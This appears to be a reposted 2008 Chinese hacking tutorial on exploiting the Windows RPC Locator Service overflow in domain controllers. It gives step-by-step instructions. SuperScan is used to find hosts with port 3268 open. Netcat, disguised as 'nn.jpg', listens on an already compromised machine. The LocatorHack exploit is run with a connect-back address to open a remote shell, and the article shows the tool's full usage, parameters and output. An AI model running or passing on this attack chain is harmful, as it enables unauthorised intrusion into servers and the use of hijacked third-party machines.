rpc漏洞的利用

2008-04-09 04:10:51来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折


sunx出的那个程序成功率还不错
没用过的去sunx.org下载吧
简要说一下用法(给没用过的看的)
首先拿superscan去扫3268端口,因为这是域控制器的标志
这个漏洞只对域控制器有效
扫到这样的机器以后,用nc在本地监听一个端口
我是内网,只好在肉鸡上监听了
下面是在肉鸡上~nn.jpg就是我放上去的nc
218.0.0.0代表目标机
123.123.123.123 代表开nc监听的肉鸡
--------------
D:\WINNT\system32>nn.jpg -l -p 1111
nn.jpg -l -p 1111
---------------~~
然后在本地(ip不能说啊)参数大家自己查吧
---------------
C:\>LocatorHack -h 218.0.0.0 -v 2 -l 2 -s 3 -r 123.123.123.123 -p 1111
MsRpcLocator formQueryPacket.wcscpy overflow. writen by sunx
http://www.sunx.org
for test only, dont used to hack,

connect socket....
connect smb...
open namedpipe...
bind rpc...
call rpc...
Overflowed, 218.0.0.0:1111 ------???是不是弄错?
good luck
------------------
这时候肉鸡上就出现了对方的system32目录
usage: LocatorHack <-h Host> <-v OSVer> <-l OSLanguage> <-s OSSP> <-r connectback host> <-p connectback port>

OS Version:
winnt: 1
win2k: 2
winxp: 3
OS Language:
english: 1
chinese: 2
japanese: 3


Exp: LocatorHack -h 192.168.0.1 -v 3 -l 1 -s 0 -r 127.0.0.1 -p 99

-h 目标主机
-v OS Version 2000就选2
-l OS Language 按照上面的选择
-s 选择所打的补丁
-r 开nc的主机,可以是你自己也可以放在肉鸡上
-p 用nc开的端口
Locator Service是指向网络特有的名称映射逻辑名称的服务。此次就是在Locator Service中发现安全漏洞的。 Locator Service被捆绑于Window NT 4.0、Windows 2000和Windows XP中。不过,只有被设置成主域控制器的Windows NT 4.0和2000中,在默认条件下Locator Service才是有效的。没有设置成主域控制器的Windows NT/2000及XP则是无效的。 用superscan扫3268吧,很快就能扫到.
关闭本页

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:公开十七项恶意代码

下一篇:榨干毒霸最后一滴油